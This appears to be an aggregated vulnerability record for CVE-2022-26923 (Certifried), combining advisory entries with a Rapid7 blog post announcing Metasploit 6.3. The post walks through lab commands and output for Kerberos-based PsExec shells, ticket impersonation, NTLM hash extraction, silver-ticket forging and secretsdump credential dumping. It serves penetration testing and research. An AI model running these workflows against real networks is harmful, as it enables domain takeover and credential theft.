{"zdi": [{"lastseen": "2022-05-19T01:45:11", "description": "This vulnerability allows network-adjacent attackers to escalate privileges on affected installations of Microsoft Windows Active Directory Certificate Services. Authentication is required to exploit this vulnerability. The specific flaw exists within the issuance of certificates. By including crafted data in a certificate request, an attacker can obtain a certificate that allows the attacker to authenticate to a domain controller with a high level of privilege. An attacker can leverage this vulnerability to escalate privileges and disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Active Directory Certificate Services Improper Authorization Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "ZDI-22-729", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-729/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-05-19T03:31:59", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Active Directory Domain Services Elevation of Privilege (CVE-2022-26923)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "CPAI-2022-0223", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-18T20:39:16", "description": "An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow for privilege escalation to SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-18T00:00:00", "type": "cisa_kev", "title": "Microsoft Active Directory Domain Services Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-08-18T00:00:00", "id": "CISA-KEV-CVE-2022-26923", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:22:09", "description": "Active Directory Domain Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T07:00:00", "type": "mscve", "title": "Active Directory Domain Services Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T08:00:00", "id": "MS:CVE-2022-26923", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26923", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-01-15T02:28:15", "description": "# CVE-2022-26923-Powershell-POC\nA powershell poc to load and aut...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T21:13:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-15T02:08:34", "id": "9282FF3E-73BE-5A7C-9FA4-01635B9C8E91", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2023-01-04T14:54:54", "description": "Active Directory Domain Services Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2022-26923", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "AKB:AAAF6327-F038-4D95-9914-564358284B96", "href": "https://attackerkb.com/topics/O4rd08Aizk/cve-2022-26923", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2023-01-30T15:01:53", "description": "\n\nThe Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.\n\n## Background\n\nKerberos is an [authentication protocol](<https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview>) that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it\u2019s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.\n\nKerberos and Active Directory more broadly have been prime [attack targets](<https://attack.mitre.org/techniques/T1558/003/>) for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a [technical whitepaper](<https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf>) on a slew of novel attack techniques targeting [Active Directory Certificate Services](<https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740\\(v=ws.11\\)>) (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.\n\nMore than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.\n\n## New in Metasploit 6.3\n\nMetasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.\n\nHighlights include:\n\n * Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM\n * The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS\n * Kerberos ticket inspection and debugging via the `auxiliary/admin/kerberos/inspect_ticket` module and the `auxiliary/admin/kerberos/keytab` module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark\n * Fully automated privilege escalation via Certifried ([CVE-2022\u201326923](<https://attackerkb.com/topics/iigmLeSKp1/cve-2022-26923-aka-certifried?referrer=blog>))\n\nSee a graph of [Metasploit authentication methods here](<https://gist.github.com/adfoster-r7/2b52461d3103ff2cd748c00f3a9e4ad2>).\n\nMSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. AD DS modules include:\n\n * [auxiliary/admin/dcerpc/samr_computer](<https://github.com/rapid7/metasploit-framework/pull/16677>), which can add, lookup, or delete computer accounts from an Active Directory domain\n * [auxiliary/admin/ldap/rbcd](<https://github.com/rapid7/metasploit-framework/pull/17181>), which lets users configure an object in Active Directory to permit another object to impersonate any other account\n * [auxiliary/gather/ldap_query](<https://github.com/rapid7/metasploit-framework/pull/17071>), which allows for remote LDAP server queries, including custom and group queries\n\nIn recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:\n\n * [auxiliary/admin/dcerpc/icpr_cert](<https://github.com/rapid7/metasploit-framework/pull/16939>), which supports issuing certs via AD CS\n * [auxiliary/gather/ldap_esc_vulnerable_cert_finder](<https://github.com/rapid7/metasploit-framework/pull/17122>), which supports hunting for ESC1, ESC 2 and ESC 3 vulnerable certificates on the target AD CS server using LDAP\n * [auxiliary/admin/kerberos/get_ticket](<https://github.com/rapid7/metasploit-framework/pull/17226>), which requests TGT/TGS tickets from the KDC using certificates by way of PKINIT\n\nAdditional features and improvements since [Metasploit 6.2](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>) include:\n\n * A [sixth `getsystem` technique](<https://github.com/rapid7/metasploit-framework/pull/16676>) that leverages the EFSRPC API to elevate a user with the `SeImpersonatePrivilege` permission to NT AUTHORITY\\SYSTEM ("EfsPotato")\n * Better Linux credential extraction through [native Mimipenguin support](<https://github.com/rapid7/metasploit-framework/pull/16688>) in Metasploit\n * Meterpreter [support](<https://github.com/rapid7/metasploit-framework/pull/16995>) for running Cobalt Strike\u2019s Beacon Object Files (BOF) \u2014 many thanks to the [TrustedSec](<https://twitter.com/TrustedSec/status/1617916890109673477>) team!\n * A [rewrite of Metasploit\u2019s datastore](<https://github.com/rapid7/metasploit-framework/pull/17475>) to resolve common errors, address edge cases, and improve user quality of life\n * Updated `show options` [support](<https://github.com/rapid7/metasploit-framework/pull/17526>) that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)\n\n## Example workflows\n\nBelow are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the [Metasploit docs site](<https://docs.metasploit.com/>). This documentation is open-source, and contributions are welcome.\n\n### Kerberos Service Authentication\n\nOpening a WinRM session:\n \n \n msf6 > use auxiliary/scanner/winrm/winrm_login\n msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local\n \n [+] 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin\n [+] 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin\n [+] 192.168.123.13:88 - Received a valid delegation TGS-Response\n [+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...\n [+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd\n [*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000\n [*] Scanned 1 of 1 hosts (100% complete)\n [*] Auxiliary module execution completed\n msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1\n [*] Starting interaction with 1...\n \n Microsoft Windows [Version 10.0.14393]\n (c) 2016 Microsoft Corporation. All rights reserved.\n \n C:\\Users\\Administrator>\n \n\nQuerying LDAP for accounts:\n \n \n msf6 > use auxiliary/gather/ldap_query\n msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13\n [*] Running module against 192.168.123.13\n \n [+] 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin\n [+] 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin\n [+] 192.168.123.13:88 - Received a valid delegation TGS-Response\n [*] Discovering base DN automatically\n [+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local\n CN=Administrator CN=Users DC=adf3 DC=local\n ==========================================\n \n Name Attributes\n ---- ----------\n badpwdcount 0\n pwdlastset 133184302034979121\n samaccountname Administrator\n useraccountcontrol 512\n ... etc ...\n \n\nRunning PsExec against a host:\n \n \n msf6 > use exploit/windows/smb/psexec\n msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local\n \n [*] Started reverse TCP handler on 192.168.123.1:4444\n [*] 192.168.123.13:445 - Connecting to the server...\n [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response\n [*] 192.168.123.13:445 - Selecting PowerShell target\n [*] 192.168.123.13:445 - Executing the payload...\n [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175686 bytes) to 192.168.123.13\n [*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000\n \n meterpreter >\n \n\nConnecting to a Microsoft SQL Server instance and running a query:\n \n \n msf6 > use auxiliary/admin/mssql/mssql_sql\n msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssql::domain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'\n [*] Reloading module...\n [*] Running module against 192.168.123.13\n \n [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response\n [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response\n [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin\n [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid\n [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)\n \n auth_scheme\n -----------\n KERBEROS\n \n [*] Auxiliary module execution completed\n \n\n### Kerberos klist support\n\nWhen running Metasploit with a database, all Kerberos tickets will be persisted into the database. The `klist` command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:\n \n \n msf6 > klist\n Kerberos Cache\n ==============\n host principal sname issued status path\n ---- --------- ----- ------ ------ ----\n 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2022-12-15 18:25:48 -0500 >>expired<< /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC.msflab.local@MSFLAB.LOCAL 2022-12-15 18:25:48 -0500 >>expired<< /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 14:51:50 -0500 valid /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC.msflab.local@MSFLAB.LOCAL 2022-12-16 17:07:48 -0500 valid /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC@MSFLAB.LOCAL 2022-12-16 17:08:26 -0500 valid /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 15:03:03 -0500 valid /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin\n 192.168.159.10 aliddle@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 15:25:16 -0500 valid /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin\n \n\nThe `klist` command also supports the `-v` flag for showing additional detail.\n\n### Requesting tickets\n\nThe `auxiliary/admin/kerberos/get_ticket` module can be used to request TGT/TGS tickets from the KDC. For instance the following example will request a TGS impersonating the Administrator account:\n \n \n msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator\n [*] Running module against 10.0.0.24\n \n [*] 10.0.0.24:88 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)\n [+] 10.0.0.24:88 - Received a valid TGT-Response\n [*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin\n [+] 10.0.0.24:88 - Received a valid TGS-Response\n [+] 10.0.0.24:88 - Received a valid TGS-Response\n [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin\n [*] Auxiliary module execution completed\n \n\nThe `auxiliary/admin/kerberos/get_ticket` module also supports authentication via PKINIT with the `CERT_FILE` and `CERT_PASSWORD` options. When used with the `GET_HASH` action, a [user-to-user (U2U) authentication](<https://learn.microsoft.com/en-us/archive/blogs/openspecification/how-kerberos-user-to-user-authentication-works>) TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.\n \n \n msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx\n [*] Running module against 192.168.159.10\n \n [+] 192.168.159.10:88 - Received a valid TGT-Response\n [*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin\n [*] 192.168.159.10:88 - Getting NTLM hash for smcintyre@msflab.local\n [+] 192.168.159.10:88 - Received a valid TGS-Response\n [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin\n [+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f\n [*] Auxiliary module execution completed\n msf6 auxiliary(admin/kerberos/get_ticket) >\n \n\n### Forging tickets\n\nAfter compromising a KDC or service account, users can forge Kerberos tickets for persistence. The `auxiliary/admin/kerberos/forge_ticket` module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:\n \n \n msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local\n \n [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin\n [*] Auxiliary module execution completed\n \n\n### Kerberos debugging support\n\nMetasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.\n\nThe new `auxiliary/admin/kerberos/inspect_ticket` module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the `auxiliary/gather/windows_secrets_dump` module or similar:\n \n \n msf6 > use auxiliary/admin/kerberos/inspect_ticket\n msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket\n Primary Principal: Administrator@WINDOMAIN.LOCAL\n Ccache version: 4\n \n Creds: 1\n Credential[0]:\n Server: cifs/dc.windomain.local@WINDOMAIN.LOCAL\n Client: Administrator@WINDOMAIN.LOCAL\n Ticket etype: 18 (AES256)\n Key: 3436643936633032656264663030393931323461366635653364393932613763\n Ticket Length: 978\n Subkey: false\n Addresses: 0\n Authdatas: 0\n Times:\n Auth time: 2022-11-21 13:52:00 +0000\n Start time: 2022-11-21 13:52:00 +0000\n End time: 2032-11-18 13:52:00 +0000\n Renew Till: 2032-11-18 13:52:00 +0000\n Ticket:\n Ticket Version Number: 5\n Realm: WINDOMAIN.LOCAL\n Server Name: cifs/dc.windomain.local\n Encrypted Ticket Part:\n Ticket etype: 18 (AES256)\n Key Version Number: 2\n Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):\n Times:\n Auth time: 2022-11-21 13:52:00 UTC\n Start time: 2022-11-21 13:52:00 UTC\n End time: 2032-11-18 13:52:00 UTC\n Renew Till: 2032-11-18 13:52:00 UTC\n Client Addresses: 0\n Transited: tr_type: 0, Contents: \"\"\n Client Name: 'Administrator'\n Client Realm: 'WINDOMAIN.LOCAL'\n Ticket etype: 18 (AES256)\n Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763\n Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)\n PAC:\n Validation Info:\n Logon Time: 2022-11-21 13:52:00 +0000\n Logoff Time: Never Expires (inf)\n Kick Off Time: Never Expires (inf)\n Password Last Set: No Time Set (0)\n Password Can Change: No Time Set (0)\n Password Must Change: Never Expires (inf)\n Logon Count: 0\n Bad Password Count: 0\n User ID: 500\n Primary Group ID: 513\n User Flags: 0\n User Session Key: 00000000000000000000000000000000\n User Account Control: 528\n Sub Auth Status: 0\n Last Successful Interactive Logon: No Time Set (0)\n Last Failed Interactive Logon: No Time Set (0)\n Failed Interactive Logon Count: 0\n SID Count: 0\n Resource Group Count: 0\n Group Count: 5\n Group IDs:\n Relative ID: 513, Attributes: 7\n Relative ID: 512, Attributes: 7\n Relative ID: 520, Attributes: 7\n Relative ID: 518, Attributes: 7\n Relative ID: 519, Attributes: 7\n Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369\n Effective Name: 'Administrator'\n Full Name: ''\n Logon Script: ''\n Profile Path: ''\n Home Directory: ''\n Home Directory Drive: ''\n Logon Server: ''\n Logon Domain Name: 'WINDOMAIN.LOCAL'\n Client Info:\n Name: 'Administrator'\n Client ID: 2022-11-21 13:52:00 +0000\n Pac Server Checksum:\n Signature: 04e5ab061c7a909a26b122c2\n Pac Privilege Server Checksum:\n Signature: 710bb183858257f41021bd7e\n \n\nMetasploit has also added first-class support for the [Keytab](<https://web.mit.edu/kerberos/www/krb5-latest/doc/basic/keytab_def.html>) file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.\n\nFor instance, if Metasploit\u2019s database is configured when running the `secretsdump` module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit\u2019s database:\n \n \n # Secrets dump\n msf6 > use auxiliary/gather/windows_secrets_dump\n msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13\n ... ommitted ...\n # Kerberos keys:\n Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01\n Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea\n Administrator:des-cbc-md5:ad49d9d92f5da170\n Administrator:des-cbc-crc:ad49d9d92f5da170\n krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c\n krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da\n krbtgt:des-cbc-md5:3ddf2f627c4cbcdc\n ... ommitted ...\n 